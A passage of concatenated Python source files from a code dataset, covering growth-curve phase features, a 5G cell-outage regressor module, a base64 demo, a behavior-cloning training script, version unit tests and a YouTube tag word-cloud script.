CurvePhases.Impulse))\n\n if impulses.any():\n return impulses[np.argmax(impulses[:, -1])][0]\n return -1\n\n_np_get_major_impulse_for_plate = np.frompyfunc(_py_get_major_impulse_for_plate, 1, 1)\n\n\ndef _np_ma_get_major_impulse_indices(phases):\n\n return np.ma.masked_less(_np_get_major_impulse_for_plate(phases), 0)\n\n# END REGION: Major pulse index\n\n\ndef _py_get_flanking_angle_relation(phases, major_impulse_index, masked):\n\n def _flank_angle(flank, impulse):\n\n if flank is None:\n\n return np.arctan2(1,\n 
impulse[VectorPhenotypes.PhasesPhenotypes.value][CurvePhasePhenotypes.LinearModelSlope])\n\n elif flank[VectorPhenotypes.PhasesClassifications.value] is CurvePhases.Flat:\n\n return np.pi - np.abs(\n np.arctan2(1, impulse[VectorPhenotypes.PhasesPhenotypes.value][CurvePhasePhenotypes.LinearModelSlope]) -\n np.arctan2(1, flank[VectorPhenotypes.PhasesPhenotypes.value][CurvePhasePhenotypes.LinearModelSlope]))\n\n elif is_detected_non_linear(flank[VectorPhenotypes.PhasesClassifications.value]):\n\n return flank[VectorPhenotypes.PhasesPhenotypes.value][CurvePhasePhenotypes.AsymptoteAngle]\n\n else:\n return np.inf\n\n if masked or \\\n phases[major_impulse_index][VectorPhenotypes.PhasesPhenotypes.value] is None:\n return np.inf\n if phases[major_impulse_index][VectorPhenotypes.PhasesClassifications.value] is not CurvePhases.Impulse:\n _l.error(\"Got index {0} as Impulse but is {1} in {2}\".format(\n major_impulse_index,\n phases[major_impulse_index][VectorPhenotypes.PhasesClassifications.value],\n phases))\n return np.inf\n\n a1 = _flank_angle(phases[major_impulse_index - 1] if major_impulse_index > 0 else None,\n phases[major_impulse_index])\n\n a2 = _flank_angle(phases[major_impulse_index + 1] if major_impulse_index < len(phases) - 1 else None,\n phases[major_impulse_index])\n\n return a2 / a1\n\n_np_get_flanking_angle_relation = np.frompyfunc(_py_get_flanking_angle_relation, 3, 1)\n\n\ndef extract_phenotypes(plate, meta_phenotype, phenotypes):\n\n if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution or \\\n meta_phenotype == CurvePhaseMetaPhenotypes.FirstMinorImpulseYieldContribution:\n\n index = -1 if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution else -2\n phase_need = 1 if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution else 2\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.FractionYield,\n phases_requirement=lambda phases: len(phases) >= phase_need,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[index]])\n\n elif (meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseAveragePopulationDoublingTime or\n meta_phenotype == CurvePhaseMetaPhenotypes.FirstMinorImpulseAveragePopulationDoublingTime):\n\n index = -1 if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseAveragePopulationDoublingTime else -2\n phase_need = 1 if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseAveragePopulationDoublingTime else 2\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.PopulationDoublingTime,\n phases_requirement=lambda phases: len(phases) >= phase_need,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[index]])\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.InitialLag:\n\n flat_slope = filter_plate_custom_filter(\n plate, phase=CurvePhases.Flat, measure=CurvePhasePhenotypes.LinearModelSlope,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[0])\n\n flat_intercept = filter_plate_custom_filter(\n plate, phase=CurvePhases.Flat, measure=CurvePhasePhenotypes.LinearModelIntercept,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[0])\n\n # TODO: Consider 
using major phase\n impulses_phase = _get_phase_id(plate, CurvePhases.Flat, CurvePhases.Impulse)\n\n impulse_slope = filter_plate_on_phase_id(\n plate, impulses_phase, measure=CurvePhasePhenotypes.LinearModelSlope)\n\n impulse_intercept = filter_plate_on_phase_id(\n plate, impulses_phase, measure=CurvePhasePhenotypes.LinearModelIntercept)\n\n lag = (impulse_intercept - flat_intercept) / (flat_slope - impulse_slope)\n lag[lag < 0] = np.nan\n return np.ma.masked_invalid(lag)\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.InitialLagAlternativeModel:\n\n impulse_slope = filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.LinearModelSlope,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[-1]])\n\n impulse_intercept = filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.LinearModelIntercept,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[-1]])\n\n impulse_start = filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.Start,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[-1]])\n\n flat_slope = 0\n flat_intercept = phenotypes[..., growth_phenotypes.Phenotypes.ExperimentLowPoint.value]\n low_point_time = phenotypes[..., growth_phenotypes.Phenotypes.ExperimentLowPointWhen.value]\n\n lag = (impulse_intercept - np.log2(flat_intercept)) / (flat_slope - impulse_slope)\n\n lag[(lag < 0) | (impulse_start < low_point_time)] = np.nan\n\n return np.ma.masked_invalid(lag)\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.InitialAccelerationAsymptoteAngle:\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthAcceleration,\n measure=CurvePhasePhenotypes.AsymptoteAngle,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[0]\n )\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.FinalRetardationAsymptoteAngle:\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthRetardation,\n measure=CurvePhasePhenotypes.AsymptoteAngle,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[-1]\n )\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.InitialAccelerationAsymptoteIntersect:\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthAcceleration,\n measure=CurvePhasePhenotypes.AsymptoteIntersection,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[0]\n )\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.FinalRetardationAsymptoteIntersect:\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthRetardation,\n measure=CurvePhasePhenotypes.AsymptoteIntersection,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[-1]\n )\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.Modalities:\n\n return _np_ma_impulse_counter(plate)\n\n elif meta_phenotype == 
CurvePhaseMetaPhenotypes.ModalitiesAlternativeModel:\n\n return _np_ma_inner_impulse_counter(plate)\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.Collapses:\n\n return _np_ma_collapse_counter(plate)\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseFlankAsymmetry:\n\n indices = _np_ma_get_major_impulse_indices(plate)\n return np.ma.masked_invalid(\n _np_get_flanking_angle_relation(plate, indices.data, indices.mask).astype(np.float))\n\n else:\n\n return np.ma.masked_invalid(np.ones_like(plate.shape) * np.nan)\n","sub_path":"scanomatic/data_processing/phases/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":17271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"486876282","text":"'''\nthis file deals with data analysis\n'''\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.linear_model import LinearRegression\nimport math\nimport sys\nfrom sklearn.model_selection import cross_val_score,cross_val_predict\nfrom sklearn.externals import joblib\nfrom enum import Enum\nfrom .models import collection_update_with_set, read_mongo_guaranteed\nimport time\n\n##############################################################\n# MACHINE LEARNING\n##############################################################\n\n\nclass Regressor(Enum):\n SIMPLE_REG = 0\n DECISION_TREE_REG = 1\n RANDOM_FOREST_REG = 2\n SVR_REG = 3\n\n\nsel_reg_enum = Regressor.SIMPLE_REG # Currently selected regressor TODO: maybe store in another file\nregressors_chart_data = [0, 0, 0, 0] # Points for graph showing performance of regressors\nregressors_table_data = [0, 0, 0, 0] # AUC scores showing performance of regressors\nz_scores_ref = [dict(), dict(), dict(), dict()] # Reference Z-scores\nregressors = [LinearRegression(), # List of available regressors\n DecisionTreeRegressor(random_state=0),\n RandomForestRegressor(n_estimators=10, random_state=0),\n SVR(kernel='rbf')]\n\n\n#######################################\n# GETTERS / SETTERS\n#######################################\n\n\ndef set_regressor(reg_enum):\n \"\"\" Sets current regressor \"\"\"\n global sel_reg_enum\n sel_reg_enum = Regressor(reg_enum)\n\n\ndef get_ref_z_scores(reg_enum):\n \"\"\" Return reference Z-scores based on enum value.\"\"\"\n global z_scores_ref\n return z_scores_ref[reg_enum.value]\n\n\ndef get_reg_chart_data():\n \"\"\" Return regressors chart data \"\"\"\n global regressors_chart_data\n return regressors_chart_data\n\n\ndef get_auc_scores():\n \"\"\" Return regressors AUC scores \"\"\"\n global regressors_table_data\n return regressors_table_data\n\n\ndef get_reg_z_scores():\n \"\"\" Return regressors reference Z-scores \"\"\"\n global z_scores_ref\n return z_scores_ref\n\n\ndef get_current_z_scores():\n \"\"\" Return current Z-scores \"\"\"\n global sel_reg_enum\n return z_scores_ref[sel_reg_enum.value]\n\n\n#######################################\n# END: GETTERS / SETTERS\n#######################################\n\n\n#######################################\n# SAVE AND LOAD REGRESSORS\n#######################################\n\n\ndef write_xy_to_csv_file(list_xy, file_name):\n \"\"\" Writes list of tuples to CSV file \"\"\"\n file = open(file_name, 'w')\n file.write(\"X,Y\\n\")\n for i in range(0, len(list_xy)):\n 
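 # Aside: the phase counters in the record above all share one pattern -\n # wrap a plain Python function with np.frompyfunc, apply it over an object\n # array, then mask the -1 sentinels, e.g. with toy data:\n # count = np.frompyfunc(lambda v: len(v) if v else -1, 1, 1)\n # plate = np.array([[(1, 2), ()], [(3,), (4, 5, 6)]], dtype=object)\n # counts = np.ma.masked_less(count(plate).astype(int), 0)\n # which yields a masked cell where the vector was empty and 2, 1, 3 elsewhere.\n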
file.write(str(list_xy[i][0]) + \",\" + str(list_xy[i][1]) + \"\\n\")\n file.close()\n\n\ndef save_all_regressors():\n \"\"\" Save all trained regressors and testing values to hard drive\"\"\"\n global regressors\n global regressors_chart_data\n global regressors_table_data\n\n # Save regressors\n joblib.dump(regressors[Regressor.SIMPLE_REG.value], 'simple_reg.pkl')\n joblib.dump(regressors[Regressor.DECISION_TREE_REG.value], 'dt_reg.pkl')\n joblib.dump(regressors[Regressor.RANDOM_FOREST_REG.value], 'rf_reg.pkl')\n joblib.dump(regressors[Regressor.SVR_REG.value], 'svr_reg.pkl')\n\n # Save testing values of regressors\n write_xy_to_csv_file(regressors_chart_data[Regressor.SIMPLE_REG.value], \"data_simple_reg.csv\")\n write_xy_to_csv_file(regressors_chart_data[Regressor.DECISION_TREE_REG.value], \"data_dt_reg.csv\")\n write_xy_to_csv_file(regressors_chart_data[Regressor.RANDOM_FOREST_REG.value], \"data_rf_reg.csv\")\n write_xy_to_csv_file(regressors_chart_data[Regressor.SVR_REG.value], \"data_svr_reg.csv\")\n file = open(\"regressors_aucs.csv\", 'w')\n file.write(str(regressors_table_data[Regressor.SIMPLE_REG.value]) + \",\" + str(regressors_table_data[Regressor.DECISION_TREE_REG.value]) + \",\" +\n str(regressors_table_data[Regressor.RANDOM_FOREST_REG.value]) + \",\" + str(regressors_table_data[Regressor.SVR_REG.value]))\n file.close()\n file = open(\"z_scores.csv\", 'w')\n for i in range(0, len(z_scores_ref)):\n comma = \"\"\n for j in range(0, len(z_scores_ref[i][\"Ref. Z-scores\"])):\n file.write(comma + str(z_scores_ref[i][\"Ref. Z-scores\"][j]))\n comma = \",\"\n file.write(\"\\n\")\n file.close()\n return 1\n\n\ndef load_all_regressors():\n \"\"\" Load all previously saved regressors from hard drive\"\"\"\n global training_done\n global regressors\n global regressors_chart_data\n global regressors_table_data\n global z_scores_ref\n try:\n regressors[Regressor.SIMPLE_REG.value] = joblib.load('simple_reg.pkl')\n regressors[Regressor.DECISION_TREE_REG.value] = joblib.load('dt_reg.pkl')\n regressors[Regressor.RANDOM_FOREST_REG.value] = joblib.load('rf_reg.pkl')\n regressors[Regressor.SVR_REG.value] = joblib.load('svr_reg.pkl')\n\n simple_data = pd.read_csv(\"data_simple_reg.csv\")\n regressors_chart_data[Regressor.SIMPLE_REG.value] = (np.array(simple_data)).tolist()\n dt_data = pd.read_csv(\"data_dt_reg.csv\")\n regressors_chart_data[Regressor.DECISION_TREE_REG.value] = (np.array(dt_data)).tolist()\n rf_data = pd.read_csv(\"data_rf_reg.csv\")\n regressors_chart_data[Regressor.RANDOM_FOREST_REG.value] = (np.array(rf_data)).tolist()\n svr_data = pd.read_csv(\"data_svr_reg.csv\")\n regressors_chart_data[Regressor.SVR_REG.value] = (np.array(svr_data)).tolist()\n\n auc_data = pd.read_csv(\"regressors_aucs.csv\", header=None)\n z_scores = pd.read_csv(\"z_scores.csv\", header=None)\n\n z_scores_list = (np.array(z_scores)).tolist()\n for i in range(0, len(z_scores_list)):\n z_scores_ref[i][\"BS\"] = get_cell_ids()\n z_scores_ref[i][\"Ref. 
Z-scores\"] = z_scores_list[i]\n\n regressors_table_data[Regressor.SIMPLE_REG.value] = auc_data.iloc[0][0]\n regressors_table_data[Regressor.DECISION_TREE_REG.value] = auc_data.iloc[0][1]\n regressors_table_data[Regressor.RANDOM_FOREST_REG.value] = auc_data.iloc[0][2]\n regressors_table_data[Regressor.SVR_REG.value] = auc_data.iloc[0][3]\n\n training_done = True\n\n return 1\n except: # Files not found..\n return 0\n\n\n#######################################\n# END: SAVE AND LOAD REGRESSORS\n#######################################\n\n\n#######################################\n# TRAIN AND TEST OF REGRESSORS\n#######################################\n\ndef train_all_regressors(x_train, y_train):\n global regressors\n for reg in regressors:\n reg.fit(x_train, y_train)\n\n\ndef test_regressor(reg_enum, test_data, correct_answers):\n \"\"\" Test regressor with test set and correct answers\n Updates regression chart_data and regression table_data accordingly \"\"\"\n global regressors_chart_data\n global regressors_table_data\n global regressors\n predictions = cross_val_predict(regressors[reg_enum.value], test_data, correct_answers, cv=6)\n false_positive_rate, true_positive_rate, thresholds = roc_curve(correct_answers, predictions)\n\n regressors_chart_data[reg_enum.value] = list(zip(false_positive_rate, true_positive_rate))\n regressors_table_data[reg_enum.value] = auc(false_positive_rate, true_positive_rate)\n\n\ndef train_and_test_all_regressions(array_x, array_y):\n \"\"\" Train and test each regressor. Get points and auc values for each classifier \"\"\"\n global training_done\n x_train, x_test, y_train, y_test = train_test_split(array_x, array_y, test_size=0.2, random_state=7)\n\n # Train all regressors\n train_all_regressors(x_train=x_train, y_train=y_train)\n\n # Test all regressors\n test_regressor(Regressor.SIMPLE_REG, x_test, y_test)\n test_regressor(Regressor.DECISION_TREE_REG, x_test, y_test)\n test_regressor(Regressor.RANDOM_FOREST_REG, x_test, y_test)\n test_regressor(Regressor.SVR_REG, x_test, y_test)\n\n training_done = True\n\n\n#######################################\n# END: TRAIN AND TEST OF REGRESSORS\n#######################################\n\n#######################################\n# RUN ML ALGORITHMS\n#######################################\n\ndef calculate_z_scores(predictions, x_test):\n \"\"\" Calculates z-scores based on predictions from regressor,\n also needs to have data containing user locations\"\"\"\n dataset_basestations = pd.read_csv(\"basestations.csv\") # TODO: make it read from DB\n\n # Calculate number users that are closest to cell:\n list_ues_per_bs = [0] * 7\n for i in range(0, len(predictions)):\n if predictions[i] >= 0.1:\n min_distance = sys.float_info.max\n base_station_id = -1\n for j, bs in dataset_basestations.iterrows():\n distance = math.sqrt(((bs[\"LocationX\"] - x_test[i][2]) ** 2) + ((bs[\"LocationY\"] - x_test[i][3]) ** 2))\n if distance < min_distance:\n min_distance = distance\n base_station_id = j\n list_ues_per_bs[base_station_id] += 1\n\n # Define Z-scores\n z1score = list()\n for i in range(0, 7):\n mean = (sum(list_ues_per_bs) - list_ues_per_bs[i]) / 6.0\n variance = 0.0\n for j in range(0, 7):\n if not j == i:\n variance += ((list_ues_per_bs[j] - mean) ** 2) / 6.0\n variance = 1.0 if variance == 0.0 else variance # Change variance to 1.0 if 0.0\n z1score.append(abs(list_ues_per_bs[i] - mean) / math.sqrt(variance))\n\n return z1score\n\n\ndef get_cell_ids():\n cell_ids = list()\n for i in range(0, 7):\n cell_ids.append(\"Cell \" + 
str(i+1)) #FIXME !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n return cell_ids\n\n\ndef calculate_reference_z_scores(array_x, array_y):\n \"\"\" Calculates reference z-score for each regressor \"\"\"\n global regressors\n global z_scores_ref\n x_train, x_test, y_train, y_test = train_test_split(array_x, array_y, test_size=0.2, random_state=7)\n predictions = regressors[Regressor.SIMPLE_REG.value].predict(np.asarray(x_test)[:, 4:])\n z_scores_ref[Regressor.SIMPLE_REG.value][\"Ref. Z-scores\"] = calculate_z_scores(predictions, x_test)\n z_scores_ref[Regressor.SIMPLE_REG.value][\"BS\"] = get_cell_ids()\n predictions = regressors[Regressor.DECISION_TREE_REG.value].predict(np.asarray(x_test)[:, 4:])\n z_scores_ref[Regressor.DECISION_TREE_REG.value][\"Ref. Z-scores\"] = calculate_z_scores(predictions, x_test)\n z_scores_ref[Regressor.DECISION_TREE_REG.value][\"BS\"] = get_cell_ids()\n predictions = regressors[Regressor.RANDOM_FOREST_REG.value].predict(np.asarray(x_test)[:, 4:])\n z_scores_ref[Regressor.RANDOM_FOREST_REG.value][\"Ref. Z-scores\"] = calculate_z_scores(predictions, x_test)\n z_scores_ref[Regressor.RANDOM_FOREST_REG.value][\"BS\"] = get_cell_ids()\n predictions = regressors[Regressor.SVR_REG.value].predict(np.asarray(x_test)[:, 4:])\n z_scores_ref[Regressor.SVR_REG.value][\"Ref. Z-scores\"] = calculate_z_scores(predictions, x_test)\n z_scores_ref[Regressor.SVR_REG.value][\"BS\"] = get_cell_ids()\n return z_scores_ref\n\n\ndef run_ml(array_x):\n \"\"\" Run machine learning once. Returns ID of broken cell.\n Based on comparing reference and new z-scores \"\"\"\n global sel_reg_enum\n predictions = regressors[sel_reg_enum.value].predict(np.asarray(array_x)[:, 4:])\n z_score_ref = get_ref_z_scores(sel_reg_enum)\n z_scores_new = dict()\n z_scores_new['BS'] = get_cell_ids()\n z_scores_new['Ref. Z-scores'] = get_ref_z_scores(sel_reg_enum)['Ref. Z-scores']\n z_scores_new['Z Score'] = calculate_z_scores(predictions, array_x)\n\n high4 = [0, -1]\n for i in range(0, 7):\n if high4[1] < z_scores_new[\"Z Score\"][i]:\n high4[1] = z_scores_new[\"Z Score\"][i]\n high4[0] = i + 1\n #high4[2] = z_scores_new[i]\n score_outage = []\n for i in range(0, 7):\n # if i == 3 and z_scores_new[i] == high4[1]:\n # score_outage.append(i)\n if z_scores_new[\"Z Score\"][i] >= z_score_ref['Ref. Z-scores'][i]:\n score_outage.append(i)\n maxval = [0, -1]\n\n for i in range(0, len(score_outage)):\n if maxval[1] < z_scores_new[\"Z Score\"][score_outage[i]]:\n maxval[1] = z_scores_new[\"Z Score\"][score_outage[i]]\n maxval[0] = score_outage[i] + 1\n #maxval[2] = z_scores_new[score_outage[i]]\n\n if maxval[1] >= 0.3:\n return [maxval[0], z_scores_new]\n else:\n return [0, z_scores_new]\n\n # OLD CODE\n # for i in range(0, 7):\n # if z_scores_new[i] >= z_scores_ref[i] and z_scores_new[i] > highest_z_score:\n # outage_id = i +1\n # highest_z_score = z_scores_new[i]\n\n#######################################\n# END: RUN ML ALGORITHMS\n#######################################\n\n\ndef get_number_of_cells():\n \"\"\" Returns number of cells in simulation \"\"\"\n dict_dfs = dict()\n if 0 < read_mongo_guaranteed(dictionary=dict_dfs, collection=\"simulation_configurations\"):\n return dict_dfs[\"simulation_configurations\"][\"nMacroEnbSites\"].iloc[-1] * 3\n\n\ndef update_nb_cell_lists():\n \"\"\"\" Updates neighbouring cell lists in DB. 
\"\"\"\n dict_dfs = dict()\n if 0 > read_mongo_guaranteed(dictionary=dict_dfs, collection=\"handover_log\"):\n return\n df_nb_cells = dict()\n read_mongo_guaranteed(dictionary=df_nb_cells, collection=\"nb_cell_list\")\n\n df_nb_pairs = dict_dfs[\"handover_log\"][[\"CellID\", \"TargetCellID\"]].loc[dict_dfs[\"handover_log\"][\"TargetCellID\"] != 0]\n cell_count = get_number_of_cells()\n\n for i in range(1, cell_count+1):\n new_nb_cells = (df_nb_pairs.loc[(df_nb_pairs[\"CellID\"] == i) | (df_nb_pairs[\"TargetCellID\"] == i)].sum(axis=1) - i).drop_duplicates().tolist()\n if len(df_nb_cells['nb_cell_list']) != 0:\n nb_cells = df_nb_cells['nb_cell_list'].loc[df_nb_cells['nb_cell_list'][\"CellID\"] == i][\"NbCellIDs\"]\n if len(nb_cells) != 0:\n new_nb_cells.extend(x for x in nb_cells.iloc[0] if x not in new_nb_cells)\n collection_update_with_set(collection=\"nb_cell_list\", query={\"CellID\": i}, value={\"NbCellIDs\": new_nb_cells})\n\n\n##############################################################\n# END: MACHINE LEARNING\n##############################################################\n","sub_path":"fiveG/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":14386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"278286327","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport base64\nimport fire\n\nclass base64_test(object):\n def base(self,data):\n print((\"data:{}\").format(data))\n# base 64でencode\n enc_data = base64.encodestring(data.encode(\"utf8\")).decode(\"ascii\")\n# そんなデータを出力\n print((\"encode data:{}\").format(enc_data))\n# decodeするよ\n dec_data = base64.decodestring(enc_data.encode(\"ascii\")).decode(\"utf8\")\n# そんなデータを出力\n print ((\"decode data:{}\").format(dec_data))\n\n\nif __name__ == '__main__':\n fire.Fire(base64_test)\n","sub_path":"blog/python_module_fire_example/import_base64.py","file_name":"import_base64.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"130788988","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.optim as optim\nimport pickle\n\n\nclass MotionData(Dataset):\n\n def __init__(self, filename):\n self.data = pickle.load(open(filename, \"rb\"))\n print(\"The dataset contains this many datapoints: \", len(self.data))\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n item = self.data[idx]\n return torch.FloatTensor(item)\n\n\nclass MLP(nn.Module):\n\n def __init__(self):\n super(MLP, self).__init__()\n\n self.fc_1 = nn.Linear(8, 16)\n self.fc_2 = nn.Linear(16, 4)\n self.loss = nn.CrossEntropyLoss()\n\n def forward(self, x):\n h1 = torch.tanh(self.fc_1(x))\n return self.fc_2(h1)\n\n\ndef main():\n\n model = MLP()\n\n EPOCH = 1000\n BATCH_SIZE_RATIO = 10.0\n LR = 0.01\n LR_STEP_SIZE = 400\n LR_GAMMA = 0.1\n\n dataname = \"expert_dataset.pkl\"\n savename = \"expert_bc.pt\"\n\n train_data = MotionData(dataname)\n BATCH_SIZE_TRAIN = int(len(train_data) / BATCH_SIZE_RATIO)\n train_set = DataLoader(dataset=train_data, batch_size=BATCH_SIZE_TRAIN, shuffle=True)\n\n optimizer = optim.Adam(model.parameters(), lr=LR)\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=LR_STEP_SIZE, gamma=LR_GAMMA)\n\n for epoch in range(EPOCH):\n for batch, x in enumerate(train_set):\n optimizer.zero_grad()\n s = x[:,0:8]\n a = x[:,8].long()\n ahat = model(s)\n loss = 
model.loss(ahat, a)\n loss.backward()\n optimizer.step()\n scheduler.step()\n print(epoch, loss.item())\n torch.save(model.state_dict(), savename)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"behavior_cloning/clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"284301591","text":"\n'''\nunit testing of punx._version module\n'''\n\n#-----------------------------------------------------------------------------\n# :author: Pete R. Jemian\n# :email: prjemian@gmail.com\n# :copyright: (c) 2014-2017, Pete R. Jemian\n#\n# Distributed under the terms of the Creative Commons Attribution 4.0 International Public License.\n#\n# The full license is in the file LICENSE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\nimport os\nimport sys\nimport unittest\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', 'src'))\nimport spec2nexus as pkg\nimport spec2nexus._version as _version\nfrom spec2nexus._version import git_release\n\n\nclass TestGitRelease(unittest.TestCase):\n\n# def test_simple(self):\n# self.assertEqual(_version.DEVELOPER_TEST_STRING, \n# '__developer_testing__', \n# 'static string exists')\n\n# def test_git_release_package_exception(self):\n# self.assertRaises(ValueError, git_release, 'not_the_package_name')\n\n def test_git_release_undefined(self):\n self.assertNotEqual('release_undefined', \n git_release(pkg.__package_name__),\n 'give the correct package name')\n\n def test_mismatch_version_string(self):\n version_string = 'mismatch_version_string'\n r = git_release(pkg.__package_name__, version_string)\n self.assertFalse(r.startswith(version_string), version_string)\n\n def test_version(self):\n path = os.path.dirname(_version.__file__)\n version_str = open(os.path.join(path, 'VERSION'), 'r').read().strip()\n\n release = git_release(pkg.__package_name__)\n self.assertTrue(release.startswith(version_str), \n 'found release: ' + release)\n\n release = git_release(pkg.__package_name__, version=version_str)\n self.assertTrue(release.startswith(version_str), \n 'found release: ' + release)\n\n version_str = 'not_a_known_version'\n release = git_release(pkg.__package_name__, version=version_str)\n self.assertFalse(release.startswith(version_str), \n 'found release: ' + release)\n\n def test_versioneer_fail(self):\n release = git_release(pkg.__package_name__, pkg.__version__)\n self.assertTrue(release.find('0+unknown') < 0, \n 'versioneer cannot find current version info')\n \n\ndef suite(*args, **kw):\n test_suite = unittest.TestSuite()\n test_suite.addTest(unittest.makeSuite(TestGitRelease))\n return test_suite\n\n\nif __name__ == '__main__':\n runner=unittest.TextTestRunner()\n runner.run(suite())\n","sub_path":"tests/_version_test.py","file_name":"_version_test.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325823175","text":"import csv\nimport os\nimport re\nfrom wordcloud import WordCloud\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread\nfrom wordcloud import WordCloud, ImageColorGenerator\n\ndef get_filenames(path):\n file_names = []\n for x in os.listdir(path):\n # print(x)\n y = os.path.join(path,x)\n if os.path.isfile(y):\n file_path = os.path.split(y)\n lists = file_path[1].split('.') #分割出文件与文件扩展名 \n file_ext = 
lists[-1] # take the extension (list slicing)\n            img_ext = ['csv']\n            if file_ext in img_ext:\n                file_name = ' '.join(lists[:-1])\n                file_names.append(file_name)\n    return file_names\n\ndef main():\n    path = 'ChannelStatistics'\n    file_names = get_filenames(path)\n\n    for name in file_names:\n        if name[0] == '#':\n            continue\n\n        tag_dict = {}\n        with open('ChannelStatistics/' + '#tag_statistics_' + name + '.csv', 'w', encoding='utf-8-sig', newline='') as csvfile:\n            fieldnames = ['tags', 'viewCount']\n            writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n            writer.writeheader()\n\n            with open(path + '/' + name + '.csv', 'r', encoding='utf-8-sig', newline='') as csvfile:\n                csv_reader = csv.DictReader(csvfile)\n                for row in csv_reader:\n                    viewCount = int(row['viewCount'])\n                    try:\n                        tags = ast.literal_eval(row['tags'])  # safe replacement for eval() on untrusted CSV content\n                    except (ValueError, SyntaxError):\n                        tags = list(row['tags'])\n\n                    for tag in tags:\n                        if tag in tag_dict:\n                            tag_dict[tag] += viewCount\n                        else:\n                            tag_dict[tag] = viewCount\n\n            for tag, viewCount in tag_dict.items():\n                writer.writerow({fieldnames[0]:tag, fieldnames[1]:viewCount})\n\ndef showFancySentiment(file_name):\n    tag_dict = {}\n\n    with open('ChannelStatistics/' + file_name + '.csv','r', encoding='utf-8-sig',newline='') as csvfile:\n        fieldnames = ['tags', 'viewCount']\n        csv_reader = csv.DictReader(csvfile)\n        for row in csv_reader:\n            viewCount = int(row['viewCount'])\n            tag = row['tags']\n            tag_dict[tag] = viewCount\n    color_mask = imread(\"china_map.png\")\n\n    wc = WordCloud(\n        # set the font; without one, CJK text renders as garbage - mind the font path\n        font_path=\"simkai.ttf\",\n        #font_path=path.join(d,'simsun.ttc'),\n        # set the background colour\n        